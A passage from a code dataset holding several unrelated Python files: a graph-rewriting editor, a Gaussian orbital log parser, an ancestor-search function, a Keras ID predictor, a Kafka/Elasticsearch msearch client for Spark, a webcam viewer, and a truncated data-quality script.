self._rho = None # current GRR\n self._graphviz = graphviz\n self._cache_dir = None\n\n @property\n def G(self):\n try:\n G = self._history._undo[-1].Gprime\n except IndexError:\n G = self._history._nx_graph\n return G\n\n @property\n def nodes_dict(self):\n try:\n nodes_dict = self._history._undo[-1].nodes_dict\n except IndexError:\n nodes_dict = self._history._nodes_dict\n return nodes_dict\n\n def startup(self):\n self._cache_dir = tempfile.TemporaryDirectory()\n import os\n print(\"Temporary cache directory created at {}\".format(os.path.abspath(self._cache_dir.name)))\n self._in_session = True\n\n def pause(self):\n self._in_session = False\n\n def resume(self):\n self._in_session = True\n\n def shutdown(self):\n self._rho = None\n self._in_session = False\n self._apply_changes_to_graph()\n self._cache_dir.cleanup()\n self._history.clear(force=True)\n\n def set_grr(self, rho):\n self._rho = rho\n\n def seek(self, 
**kwargs):\n\n if self._rho:\n gs = self._rho.seek(self.G, self.nodes_dict, **kwargs)\n else:\n gs = None\n print(\"No rule defined.\")\n\n return gs\n\n def edit(self, gs=None, **kwargs):\n\n if self._rho and self._in_session:\n\n if gs is None:\n gs = self.seek(**kwargs)\n\n for g in gs:\n\n try:\n G_new, nodes_dict_new = self._rho.apply(self.G, self.nodes_dict, g) # derivation\n self._history.push(Commit(self._rho, g, G_new, nodes_dict_new))\n status = __SUCCESS__\n\n except Exception as e:\n print(\"An issue arose while applying rule {} to graph <{}> at point: \".format(type(self._rho), self.G))\n for vH, vL in g.items():\n print(\"\\t\", vH, vL)\n print(e)\n status = __FAILURE__\n\n if (status == __SUCCESS__) and self._graphviz:\n self._take_snapshot()\n\n else:\n if self._rho is None:\n print(\"No rule defined for editor object <{}>.\".format(self))\n else:\n print(\"Editor object <{}> is not in an editing session.\".format(self))\n\n def add_io_handles(self):\n\n if isinstance(self.qlgraph, graphs.PyTorchGraph):\n self.startup()\n self.set_grr(grrules.AddInputNodeRule())\n self.edit(gs=self.seek(VIs=[[n] for n in self._input_nodes]))\n self.set_grr(grrules.AddOutputNodeRule())\n self.edit(gs=self.seek(VIs=[[n] for n in self._output_nodes]))\n self.pause()\n\n def _apply_changes_to_graph(self):\n\n self.qlgraph.nx_graph = self.G\n self.qlgraph.nodes_dict = self.nodes_dict\n\n def _take_snapshot(self):\n filename = datetime.now().strftime(\"%H:%M:%S_{}_{}\".format(len(self._history._undo), type(self._history._undo[-1].rho)))\n utils.draw_graph(self.G, self._cache_dir.name, filename) # take a snapshot of the edited graph\n\n# 1. label graph nodes (node label is usually computed as the aggregation of 1.partition and 2.type, but see COMMENT below)\n# 2. define a graph rewriting rule (GRR)\n# 3. 'discover' possible application points for the rules\n# 4. 'filter' the sequence of application points (possibly NOT automatic)\n# 5. 'apply' the rule to the filtered sequence of application points\n# - each pair (rule, application_point) is called a 'transform', and the resulting graph is called a 'derivation'\n# 6. 'generate_code' for the transformed graph\n# 7. 'import_network' from the transformed graph's file\n\n# [COMMENT] Steps 1 and 2 are usually designed in reversed order:\n# - the user first thinks to the rule\n# - then decides which \"pieces\" should be in the label\n# which \"ingredients\" did I use in the past to generate these labels? 
(my personal \"database/record\" of use cases)\n# - ONNX op type\n# - node scope\n\n","sub_path":"editing/graphs/editor/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29977374","text":"\"\"\"\r\n\r\nGiven an input gaussian log file, parse out the atomic coordinates and molecular orbitals.\r\n\r\nOutput:\r\n \r\n orbital table/matrix:\r\n Example:\r\n Molecular Orbital Coefficients:\r\n 1 2 3 4 5\r\n O O O O O\r\n Eigenvalues -- -1.36363 -1.17864 -1.15298 -1.11813 -1.11310\r\n 1 1 O 1S 0.25305 -0.05726 0.00090 0.56130 0.01346\r\n 2 1PX 0.18053 -0.02074 0.00605 0.11692 0.01466\r\n 3 1PY 0.14800 -0.00818 -0.00997 0.14767 -0.02255\r\n 4 1PZ 0.14746 -0.02153 0.00477 0.08341 0.02417\r\n 5 2 N 1S 0.78611 -0.03071 0.00727 0.01200 0.03001 \r\n\r\n \r\n molname_Molecular_orbitals.json: [\r\n {\r\n MO_number : int\r\n , occupied : bool\r\n , eigenvalue : float\r\n , atomic_contributions: [\r\n {\r\n atom_number : int\r\n , atom_symbol : str\r\n , atomic_orbitals : [\r\n orbital_symbol : str\r\n , energy : float\r\n ]\r\n },\r\n ...\r\n ]\r\n }\r\n , ...\r\n ]\r\n\r\n\r\n HOMO MO_number given by MO_number of last occupied MO\r\n LUMO MO_number given by HOMO MO_number + 1\r\n\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nfrom typing import Iterable, List\r\nimport re\r\nimport json\r\nimport argparse\r\n\r\nimport numpy as np\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\r\n \"-i\", \"--input-file\", dest=\"inputFile\", help=\"input gaussian log file to parse orbitals from\", type=str\r\n)\r\nparser.add_argument(\r\n \"--orbitals\", type=str, dest=\"orbitals\", help='string of comma separated values of the orbitals to extract. Values can be an integer or the string \"homo\" or \"lumo\". 
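For example, --orbitals \"homo,lumo\" extracts just those two orbitals. 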
Leave blank to extract all orbitals or don\\'t pass this parameter.'\r\n)\r\n\r\nargs = parser.parse_args()\r\n\r\ninFile: str = args.inputFile\r\n\r\norbitals = args.orbitals\r\nif orbitals:\r\n orbitals = orbitals.split(\",\")\r\nelse:\r\n orbitals = [\"\"]\r\n\r\n\r\nmolName, _ = os.path.splitext(inFile)\r\n\r\n###########################\r\n### Read the input log file\r\n###########################\r\n\r\nwith open(inFile, \"r\") as ReadFile:\r\n fileContent: List[str] = list(ReadFile.readlines())\r\n\r\n##################################\r\n### Get list of orbital symmetries \r\n##################################\r\n\r\n### Natoms line regex\r\nstart_coords_pattern = re.compile(r\"Charge =\\s+\\d Multiplicity\")\r\n\r\noccupied_symm_lines: List[str] = []\r\nvirtual_symm_lines: List[str] = []\r\n\r\nstart_idx = None\r\nocc = None\r\nvirt = None\r\nMO_table_start_idx = None\r\nMO_table_end_idx = None\r\nstart_coords = False\r\natom_num = 1\r\n### {\"{atom_num}\" : [x,y,z]}\r\natomic_coords = {}\r\nfor idx, line in enumerate(fileContent):\r\n if \"Orbital symmetries:\" in line:\r\n start_idx = idx\r\n if start_idx:\r\n if \"Occupied\" in line:\r\n occ = True\r\n elif \"Virtual\" in line:\r\n occ = None\r\n virt = True\r\n if \"electronic state\" in line:\r\n end_idx = idx\r\n start_idx = None\r\n occ = None\r\n virt = None\r\n if occ:\r\n occupied_symm_lines.append(line.strip())\r\n elif virt:\r\n virtual_symm_lines.append(line.strip())\r\n\r\n elif start_coords:\r\n if line.strip() == \"\":\r\n start_coords = False\r\n else:\r\n atomic_coords[atom_num] = [float(x) for x in line.split()[1:]]\r\n atom_num += 1\r\n\r\n elif re.search(start_coords_pattern, line):\r\n start_coords = True\r\n\r\n elif \"molecular orbital coefficients:\" in line.lower():\r\n MO_table_start_idx = idx+1\r\n \r\n elif \"Density Matrix:\" in line:\r\n MO_table_end_idx = idx\r\n break\r\n\r\n\r\n### Fix orbital symmetries\r\noccupied_symm_lines[0] = occupied_symm_lines[0].split(\"Occupied \")[1]\r\nvirtual_symm_lines[0] = virtual_symm_lines[0].split(\"Virtual \")[1]\r\n\r\n### flatten into lists of symmetries\r\noccupied_symm = [item for sublist in map(lambda x: x.strip().split(\" \"), occupied_symm_lines) for item in sublist]\r\nvirtual_symm = [item for sublist in map(lambda x: x.strip().split(\" \"), virtual_symm_lines) for item in sublist]\r\n\r\nnumber_occupied_orbitals: int = len(occupied_symm)\r\nnumber_virtual_orbitals: int = len(virtual_symm)\r\n#print(number_occupied_orbitals + number_virtual_orbitals)\r\n\r\n\r\n### What orbitals are wanted?\r\nif orbitals == ['']:\r\n wanted_orbitals = [x for x in range(number_occupied_orbitals + number_virtual_orbitals)]\r\nelif len(orbitals) > 0:\r\n wanted_orbitals: List[int] = []\r\n for x in orbitals:\r\n if x.lower() == \"homo\":\r\n wanted_orbitals.append(number_occupied_orbitals)\r\n elif x.lower() == \"lumo\":\r\n wanted_orbitals.append(number_occupied_orbitals+1)\r\n else:\r\n wanted_orbitals.append(int(x))\r\nelse:\r\n raise Exception(\"something went wrong with wanted_orbitals\")\r\n\r\n####################################\r\n### Grab the molecular orbital table\r\n####################################\r\n\r\ndata = {}\r\n\r\ndef saveData(MO_numbers\r\n , isOccupied\r\n , eigenvalues\r\n , atomic_data):\r\n \"\"\"\r\n molname_Molecular_orbitals.json --> {\r\n MO_number : { \r\n , occupied : bool\r\n , eigenvalue : float\r\n , atomic_contributions: [\r\n atom_number : {\r\n , atom_symbol : str\r\n , atomic_orbitals : [\r\n {\r\n atomic_orbital_number : int\r\n 
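atomic_orbital_number : int\r\n                        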
, orbital_symbol : str\r\n , energy : float\r\n }\r\n , ...\r\n ]\r\n },\r\n ...\r\n ]\r\n }\r\n , ...\r\n }\r\n \"\"\"\r\n MO_data = {\r\n\r\n }\r\n\r\n ### Process atomic data\r\n atomic_data_T = np.array(atomic_data).T\r\n for idx, MO_number in enumerate(MO_numbers):\r\n MO_data[MO_number] = {\r\n \"occupied\" : isOccupied[idx]\r\n , \"eigenvalue\": eigenvalues[idx]\r\n , \"atomic_contributions\" : {}\r\n }\r\n for row in atomic_data:\r\n (\r\n ao_number\r\n , atom_number\r\n , atom_symbol\r\n , ao_symbol\r\n , a_contributions\r\n ) = row\r\n for idx, energy in enumerate(a_contributions):\r\n mo_num = MO_numbers[idx]\r\n \r\n if atom_number not in MO_data[mo_num][\"atomic_contributions\"]:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number] = {}\r\n \r\n if \"atom_symbol\" not in MO_data[mo_num][\"atomic_contributions\"][atom_number]:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number][\"atom_symbol\"] = atom_symbol\r\n \r\n if \"atomic_orbitals\" not in MO_data[mo_num][\"atomic_contributions\"][atom_number]:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number][\"atomic_orbitals\"] = [{\r\n \"atomic_orbital_number\" : ao_number\r\n , \"orbital_symbol\" : ao_symbol\r\n , \"energy\" : energy\r\n }]\r\n else:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number][\"atomic_orbitals\"].append({\r\n \"atomic_orbital_number\" : ao_number\r\n , \"orbital_symbol\" : ao_symbol\r\n , \"energy\" : energy\r\n })\r\n\r\n\r\n\r\n data.update(MO_data)\r\n\r\ndef any_in(l1: List, l2:List):\r\n for el in l1:\r\n if el in l2:\r\n return True\r\n return False \r\n\r\n### WE ARE ASSUMING THAT the Number of MO orbitals will be the number of atomic orbitals\r\nif not MO_table_start_idx:\r\n raise Exception(\"No start index for MO table\")\r\nif not MO_table_end_idx:\r\n raise Exception(\"No end index for MO table\")\r\n\r\n### Define regex patterns\r\nm_orb_num_pattern = re.compile(r\" {5,}([\\d ][\\d ]\\d +){1,5}\")\r\neigenvalues_pattern = re.compile(r\" Eigenvalues -- \")\r\nisOccupied_pattern = re.compile(r\" {5,}([^\\d\\W] {9})+\")\r\na_orbital_pattern = re.compile(r\"^[\\d ]{1,3}\\d [\\d ]{1,3} [\\w ]{2} \\d\\w[\\w ] \")\r\n\r\n\r\nMO_table_lines = fileContent[MO_table_start_idx:MO_table_end_idx]\r\n\r\nMO_numbers = None\r\neigenvalues = None\r\nisOccupied = None\r\natomic_data = []\r\nfor line in MO_table_lines:\r\n\r\n ### Match MO number line\r\n if m_orb_num_pattern.match(line):\r\n if MO_numbers:\r\n ### TODO: save data from this chunk before starting next chunk\r\n saveData(MO_numbers, isOccupied, eigenvalues, atomic_data)\r\n atomic_data = []\r\n \r\n MO_numbers = [int(x) for x in line.strip().split()]\r\n if not any_in(MO_numbers, wanted_orbitals):\r\n MO_numbers = None\r\n\r\n ### Match eigenvalues line\r\n elif eigenvalues_pattern.match(line) and MO_numbers:\r\n eigenvalues = [float(x) for x in line[23:].split()]\r\n\r\n ### Match isOccupied line\r\n elif isOccupied_pattern.match(line) and MO_numbers:\r\n isOccupied = [True if x.lower() == \"o\" else False for x in line.strip().split()]\r\n pass\r\n\r\n ### Match atomic orbital contribution line\r\n elif a_orbital_pattern.match(line) and MO_numbers:\r\n ### TODO: split into relevant columns of information\r\n ao_number = int(line[0:4])\r\n tmp_atom_num = line[5:8]\r\n if tmp_atom_num.strip() == '':\r\n tmp_atom_num = atom_num\r\n else:\r\n tmp_atom_num = int(tmp_atom_num)\r\n atom_num = int(tmp_atom_num)\r\n tmp_atom_symbol = line[9:11]\r\n if tmp_atom_symbol.strip() == \"\":\r\n tmp_atom_symbol = atom_symbol\r\n 
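# a blank symbol column marks a continuation row of the previous atom\r\n            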
else:\r\n                tmp_atom_symbol = tmp_atom_symbol.strip()\r\n            atom_symbol = tmp_atom_symbol\r\n            ao_symbol = line[12:15].strip()\r\n            energies = [float(x) for x in line[16:].split()]\r\n            row = [ao_number, tmp_atom_num, tmp_atom_symbol, ao_symbol, energies]\r\n            atomic_data.append(row)\r\n\r\n### TODO: save the last chunk\r\nif MO_numbers:\r\n    saveData(MO_numbers, isOccupied, eigenvalues, atomic_data)\r\n\r\n#############################\r\n# Save atomic coordinates\r\n#############################\r\ndata[\"atomic_coords\"] = atomic_coords\r\n\r\njson.dump(data, sys.stdout)","sub_path":"y4_python/parse_orbitals.py","file_name":"parse_orbitals.py","file_ext":"py","file_size_in_byte":10495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"205646633","text":"\nclass Stack:\n    def __init__(self):\n        self.stack = []\n\n    def push(self, value):\n        return self.stack.append(value)\n\n    def pop(self):\n        if self.size() > 0:\n            return self.stack.pop()\n        else:\n            return None\n\n    def size(self):\n        return len(self.stack)\n\ndef earliest_ancestor(ancestors, starting_node):\n    dict_ancestor = {}\n    stack = Stack()\n    visited = set()\n    longest_path = []\n\n    for i, x in enumerate(ancestors):\n        dict_ancestor[i] = x\n\n    for i, v in dict_ancestor.items():\n        if v[1] == starting_node:\n            stack.push([i])\n\n\n    size = stack.size()\n\n    if stack.size() > 0:\n        while size > 0:\n            # print(dict_ancestor)\n            # print(stack.stack)\n            current_node = stack.pop()\n            single_node = current_node[-1]\n            size = stack.size()\n\n            if single_node not in visited:\n                # print(\"sn not in visited\")\n                visited.add(single_node)\n                parent = dict_ancestor[single_node][0]\n                # print(parent)\n\n                for i, v in dict_ancestor.items():\n                    if v[1] == parent:\n                        new_path = current_node[:]\n                        new_path.append(i)\n                        stack.push(new_path)\n                        # print(\"new_path:\", new_path)\n\n                        if len(new_path) > len(longest_path):\n                            longest_path = new_path\n                    elif i == len(dict_ancestor) - 1:\n                        longest_path = current_node\n\n\n            size = stack.size()\n\n        final_answer = (dict_ancestor[longest_path[-1]][0])\n        return final_answer \n    else:\n        return -1\n\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"556350222","text":"from keras.models import load_model\nfrom keras.utils import to_categorical\nfrom collections import Counter\nimport numpy as np\n\nmd=load_model(\"../model/dynamic_model.h5\")\n\nID_MAP_DICT={}\nID_MAP_DICT2={}\nID_MAP_TOTAL=1\n\nSEQLEN=5\nNAME_TYPE=32\n\nCUR_MAPPD_ID=1\n\nDELTA_COUNTER=Counter()\n\nCUR_DELTA=[1]*5\n\n\n# Input: an int\n# Output: the currently predicted int\n# Notes on the output: 0 means no successful prediction;\n#         any other value is the predicted int, and that int is guaranteed to have appeared before\n# Example: ypred=dynamic_predict(12)\n\ndef dynamic_predict(id_in):\n    global ID_MAP_DICT,ID_MAP_TOTAL,ID_MAP_DICT2,md\n\n    id_map=1\n    if id_in in ID_MAP_DICT:\n        id_map=ID_MAP_DICT[id_in]\n    else:\n        ID_MAP_DICT[id_in]=ID_MAP_TOTAL\n        ID_MAP_DICT2[ID_MAP_TOTAL]=id_in\n        id_map=ID_MAP_TOTAL\n        ID_MAP_TOTAL+=1\n\n    global CUR_MAPPD_ID,DELTA_COUNTER,SEQLEN,NAME_TYPE,CUR_DELTA\n    delta=id_map-CUR_MAPPD_ID\n    CUR_MAPPD_ID=id_map\n    DELTA_COUNTER[delta]+=1\n\n    delta_map={}\n    delta_map2={}\n    total=1\n    for i in DELTA_COUNTER.most_common(31):\n        delta_map[i[0]]=total\n        delta_map2[total]=i[0]\n        total+=1\n\n    cur_delta=[]\n    for i in CUR_DELTA:\n        if i in delta_map:\n            cur_delta.append(delta_map[i])\n        else:\n            cur_delta.append(0)\n\n    CUR_DELTA=CUR_DELTA[1:]\n    CUR_DELTA.append(delta)\n\n    if delta in delta_map:\n        
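# replace the raw delta with its index in the 31-entry delta vocabulary\n        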
delta=delta_map[delta]\n else:\n delta=0\n\n\n x=to_categorical([cur_delta],num_classes=NAME_TYPE)\n y=to_categorical([delta],num_classes=NAME_TYPE)\n\n md.fit(x,y,batch_size=1,epochs=1,verbose=0)\n\n\n cur_delta=[]\n for i in CUR_DELTA:\n if i in delta_map:\n cur_delta.append(delta_map[i])\n else:\n cur_delta.append(0)\n\n x=to_categorical([cur_delta],num_classes=NAME_TYPE)\n\n pred=md.predict(x,verbose=0)[0]\n ypred=np.argmax(pred)\n\n\n if ypred in delta_map2:\n temp=delta_map2[ypred]+CUR_MAPPD_ID\n if temp in ID_MAP_DICT2:\n return ID_MAP_DICT2[temp]\n\n else: return 0\n else: return 0\n","sub_path":"DFS/predict_1/src/dynamic_predict.py","file_name":"dynamic_predict.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177155975","text":"\"\"\"\nClient for pushing elasticsearch queries into a kafka topic and reading results\nback from a second kafka topic. This runs on the analytics side as part of feature\ncollection.\n\"\"\"\n\nimport base64\nfrom collections import namedtuple\nimport json\nimport os\nimport time\n\nimport kafka\n\nimport mjolnir.spark\nimport mjolnir.kafka\n\n# Kafka client configuration\nClientConfig = namedtuple('ClientConfig', [\n 'brokers', 'req_topic', 'resp_topic', 'control_topic'])\n# 4 fields and 3 defaults means brokers is still required.\n# TODO: This is basically a hack, mypy doesn't like it. Remove?\nClientConfig.__new__.__defaults__ = ( # type: ignore\n mjolnir.kafka.TOPIC_REQUEST,\n mjolnir.kafka.TOPIC_RESULT,\n mjolnir.kafka.TOPIC_COMPLETE)\n\n# A specific range of a kafka.TopicPartition\nOffsetRange = namedtuple('OffsetRange', ['tp', 'start', 'end'])\n\n\ndef _make_producer(client_config):\n return kafka.KafkaProducer(bootstrap_servers=client_config.brokers,\n compression_type='gzip')\n\n\ndef ratelimit(rows, rate, clock=time.monotonic):\n \"\"\"Apply per-second rate limit to iterable.\n\n Parameters\n ----------\n rows : iterable\n rate : int\n Number of rows to allow through per second\n clock : callable\n 0-arity function returning current time in seconds\n \"\"\"\n next_reset = clock() + 1\n num_rows = 0\n for row in rows:\n time_remaining = next_reset - clock()\n if time_remaining < 0 or num_rows >= rate:\n if time_remaining > 0:\n time.sleep(time_remaining)\n num_rows = 0\n next_reset = clock() + 1\n num_rows += 1\n yield row\n\n\ndef produce_queries(\n df, client_config, run_id, create_es_query, meta_keys,\n max_concurrent_producer=20, rate_limit_per_sec=1500\n):\n \"\"\"Push msearch queries into kafka.\n\n Write out the dataframe rows to kafka as elasticsearch multi-search queries.\n These will be picked up by the msearch daemon, and the collected back in\n the collect_results function.\n\n Parameters\n ----------\n df : pyspark.sql.DataFrame\n Source data frame to collect feature vectors for\n client_config : ClientConfig\n run_id : str\n A unique identifier for this data collection run\n create_es_query : callable\n Function accepting a row from df that returns a string\n containing an elasticsearch query.\n meta_keys : list of str\n List of Row fields to include in the message metadata. These\n will be returned when consuming responses.\n max_concurrent_producer : int\n Maximum number of concurrent producers to use. 
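One producer is created per\n        Spark partition after the request RDD is coalesced. 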
This helps keep\n unnecessary load off of the kafka clusters.\n rate_limit_per_sec : int\n Maximum number of records to produce per second to kafka\n across all producers\n\n Returns\n -------\n int\n The number of end run sigils to wait for in the complete topic.\n \"\"\"\n\n meta_keys = set(meta_keys)\n # If we have fewer than max_concurrent_producer partitions this\n # won't change anything.\n rdd = df.rdd.coalesce(max_concurrent_producer)\n # No guarantee spark will run all of the partitions concurrently,\n # but set the per-partition rate limit assuming all of them are.\n partition_rate_limit = rate_limit_per_sec / rdd.getNumPartitions()\n\n def produce_partition(rows):\n producer = _make_producer(client_config)\n for row in ratelimit(rows, partition_rate_limit):\n producer.send(client_config.req_topic, json.dumps({\n 'run_id': run_id,\n 'request': create_es_query(row),\n 'meta': {k: v for k, v in row.asDict().items() if k in meta_keys},\n }).encode('utf8'))\n producer.close()\n\n mjolnir.spark.assert_columns(df, meta_keys)\n rdd.foreachPartition(produce_partition)\n\n # Send a sigil value to indicate this run is complete. The consumer will copy this\n # into TOPIC_COMPLETE so we know it's done.\n producer = _make_producer(client_config)\n partitions = producer.partitions_for(client_config.req_topic)\n for p in partitions:\n producer.send(client_config.req_topic, partition=p, value=json.dumps({\n 'run_id': run_id,\n 'complete': True,\n 'partition': p\n }).encode('utf8'))\n producer.close()\n return len(partitions)\n\n\ndef offsets_for_times(consumer, partitions, timestamp):\n \"\"\"Augment KafkaConsumer.offsets_for_times to not return None\n\n Parameters\n ----------\n consumer : kafka.KafkaConsumer\n This consumer must only be used for collecting metadata, and not\n consuming. APIs will be used that invalidate consuming.\n partitions : list of kafka.TopicPartition\n timestamp : number\n Timestamp, in seconds since unix epoch, to return offsets for.\n\n Returns\n -------\n dict from kafka.TopicPartition to integer offset\n \"\"\"\n # Kafka uses millisecond timestamps\n timestamp_ms = int(timestamp * 1000)\n response = consumer.offsets_for_times({p: timestamp_ms for p in partitions})\n offsets = {}\n for tp, offset_and_timestamp in response.items():\n if offset_and_timestamp is None:\n # No messages exist after timestamp. 
Fetch latest offset.\n consumer.assign([tp])\n consumer.seek_to_end(tp)\n offsets[tp] = consumer.position(tp)\n else:\n offsets[tp] = offset_and_timestamp.offset\n return offsets\n\n\ndef offset_range_for_timestamp_range(brokers, start, end, topic):\n \"\"\"Determine OffsetRange for a given timestamp range\n\n Parameters\n ----------\n brokers : str or list of str\n Kafka brokers to bootstrap the metadata consumer from\n start : number\n Unix timestamp in seconds\n end : number\n Unix timestamp in seconds\n topic : str\n Topic to fetch offsets for\n\n Returns\n -------\n list of OffsetRange or None\n Per-partition ranges of offsets to read\n \"\"\"\n consumer = kafka.KafkaConsumer(bootstrap_servers=brokers)\n partitions = consumer.partitions_for_topic(topic)\n if partitions is None:\n # Topic does not exist.\n return None\n partitions = [kafka.TopicPartition(topic, p) for p in partitions]\n o_start = offsets_for_times(consumer, partitions, start)\n o_end = offsets_for_times(consumer, partitions, end)\n return [OffsetRange(tp, o_start[tp], o_end[tp]) for tp in partitions]\n\n\ndef wait_for_sigils(client_config, run_id, num_end_sigils):\n \"\"\"Wait for the end run sigils to be reflected\n\n The 'end run' message gets reflected, by the client running the msearch\n daemon, back into TOPIC_COMPLETE into all partitions. This waits until\n all sigils that were sent have been reflected, indicating everything sent\n before the sigil has been processed and is available in the result topic.\n\n Parameters\n ----------\n client_config : ClientConfig\n run_id : str\n Unique identifier for this run\n num_end_sigils : int\n The number of unique end run sigils to expect. This should be the number of partitions\n of the topic requests were produced to.\n \"\"\"\n consumer = kafka.KafkaConsumer(bootstrap_servers=client_config.brokers,\n # The topic we are reading from is very low volume,\n # containing only reflected end run sigils. To make\n # sure we don't miss one start at the beginning.\n auto_offset_reset='earliest',\n value_deserializer=lambda x: json.loads(x.decode('utf8')))\n parts = consumer.partitions_for_topic(client_config.control_topic)\n if parts is None:\n raise RuntimeError(\"topic %s missing\" % client_config.control_topic)\n\n # Tracks the sigils that have been seen for the request topics\n # Uses a set in case duplicate messages are sent somehow, to ensure\n # we see a message for all expected partitions\n seen_sigils = set()\n consumer.subscribe([client_config.control_topic])\n try:\n for message in consumer:\n if 'run_id' in message.value and message.value['run_id'] == run_id and 'complete' in message.value:\n print('found sigil for run %s and partition %d' % (message.value['run_id'], message.value['partition']))\n seen_sigils.add(message.value['partition'])\n # Keep reading until all sigils have been reflected.\n if len(seen_sigils) >= num_end_sigils:\n return\n raise RuntimeError(\"Finished consuming, but %d partitions remain\" % (num_end_sigils - len(seen_sigils)))\n finally:\n consumer.close()\n\n\ndef kafka_to_rdd(sc, client_config, offset_ranges):\n \"\"\"Read ranges of kafka partitions into an RDD.\n\n Parameters\n ----------\n sc : pyspark.SparkContext\n client_config : ClientConfig\n offset_ranges : list of OffsetRange\n List of topic partitions along with ranges to read. 
Start\n and end of range are inclusive.\n\n Returns\n -------\n pyspark.RDD\n Contents of the specified offset_ranges\n \"\"\"\n def read_offset_range(offset_range):\n if offset_range.end <= offset_range.start:\n # Raise exception?\n return\n # After serialization round trip these fail an isinstance check.\n # re-instantiate so we have the expected thing.\n tp = kafka.TopicPartition(*offset_range.tp)\n consumer = kafka.KafkaConsumer(bootstrap_servers=client_config.brokers,\n value_deserializer=lambda x: json.loads(x.decode('utf8')))\n try:\n consumer.assign([tp])\n consumer.seek(tp, offset_range.start)\n while True:\n poll_response = consumer.poll(timeout_ms=10000)\n if poll_response and tp in poll_response:\n for message in poll_response[tp]:\n if message.offset > offset_range.end:\n break\n yield message.value\n if consumer.position(tp) >= offset_range.end:\n break\n finally:\n consumer.close()\n\n return (\n # TODO: This isn't the same as assigning each offset_range to a separate\n # partition, but it doesn't seem like pyspark allows us to do that. Often\n # enough this seems to achieve the same thing, but without guarantees.\n sc.parallelize(offset_ranges, len(offset_ranges))\n .flatMap(read_offset_range)\n )\n\n\ndef collect_results(sc, client_config, receive_record, start, end, run_id):\n \"\"\"\n Parameters\n ----------\n sc : pyspark.SparkContext\n client_config : ClientConfig\n receive_record : callable\n Callable receiving a json decoded record from kafka. It should return\n a list and the resulting rdd will have a record per result returned.\n start : int\n Timestamp, in seconds since unix epoch, at which to start looking for records\n end : int\n Timestamp at which to stop looking for records.\n run_id : str\n unique identifier for this run\n\n Returns\n -------\n pyspark.RDD\n RDD containing results of receive_record\n \"\"\"\n # Decide what offsets we need.\n offset_ranges = offset_range_for_timestamp_range(\n client_config.brokers, start, end, client_config.resp_topic)\n if offset_ranges is None:\n raise RuntimeError('Could not retrieve offset ranges for result topic. Does it exist?')\n\n # If this ends up being too much data from kafka, blowing up memory in the\n # spark executors, we could chunk the offsets and union together multiple RDD's.\n return (\n kafka_to_rdd(sc, client_config, offset_ranges)\n .filter(lambda rec: 'run_id' in rec and rec['run_id'] == run_id)\n .flatMap(receive_record))\n\n\ndef msearch(df, client_config, meta_keys, create_es_query, handle_response):\n \"\"\"Run an msearch against each row of the input dataframe\n\n Parameters\n ----------\n df : pyspark.sql.DataFrame\n client_config : ClientConfig\n Configuration of brokers and topics to communicate with\n meta_keys : list of str\n List of fields in df to pass through to handle_response\n create_es_query : callable\n Transform row from df into a valid elasticsearch bulk request. This\n must be a str ready for POST exactly following the msearch spec.\n handle_response : callable\n Processes individual responses from elasticsearch. A single dict argument\n is provided with the keys `status_code`, `text` and `meta`. Status code is\n the http status code. Text contains the raw text result. Meta is a dict\n containing the key/value pairs from meta_keys.\n\n Returns\n -------\n pyspark.RDD\n The result of running msearch on the input. 
The shape is determined\n by the results of the `handle_response` argument\n \"\"\"\n # assumes client_config was a list of brokers to connect to\n # and the topics take defaults\n if not isinstance(client_config, ClientConfig):\n client_config = ClientConfig(client_config)\n\n run_id = base64.b64encode(os.urandom(16)).decode('ascii')\n # Adjust the start/end times by one minute to give a little flexibility in data arriving.\n start = time.time() - 60\n num_end_sigils = produce_queries(df, client_config, run_id, create_es_query, meta_keys)\n wait_for_sigils(client_config, run_id, num_end_sigils)\n end = time.time() + 60\n return collect_results(df._sc, client_config, handle_response, start, end, run_id)\n","sub_path":"mjolnir/kafka/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"566101454","text":"import numpy as np\nimport cv2\ncap = cv2.VideoCapture(0)\nwhile(True):\n \n ret, frame = cap.read()\n r,c,ch = frame.shape\n frame = cv2.resize(frame.copy(),(int(c/2),int(r/2)))\n print(frame.shape)\n # b,g,r = cv2.split(frame)\n # cv2.imshow('Red',r)\n # cv2.imshow('Blue',b)\n # cv2.imshow('Green',g)\n # img = cv2.merge((b,g,r))\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # cv2.imshow('Gray',gray)\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"open_camera.py","file_name":"open_camera.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"617640784","text":"'''\nCreated on Oct 4, 2017\n\n@author: goktug.yorulmaz\n'''\n\nimport time\n\nimport Utilities\n\nToday=time.strftime (\"%d_%m_%y\") \n\nf=open('C:\\Data_Quality\\Permits.csv', mode=\"r\")\n\nPermitId=Utilities.RetrieveIntoDictionary(f,'\\t',1,header=0)\n\nf=open('C:\\Data_Quality\\Permits_Answers.csv', mode=\"r\")\n\nPermitId_Answers=Utilities.RetrieveIntoDictionary(f, '\\t',1,header=0)\n\nlogfile=open(\"C:\\Data_Quality\\Permit_Data_Quality_\"+Today+\".log\",mode='w')\n \nlogfile.write(\"Completed Retrieving Answer Key And New Permit Entries Into Dictionaries \\n\") \n\nfor key in PermitId_Answers:\n try:\n Answer=PermitId_Answers[key]\n Permits=PermitId[key] \n \n iterator=0\n for x in Answer:\n if(Answer[iterator]!=Permits[iterator]):\n 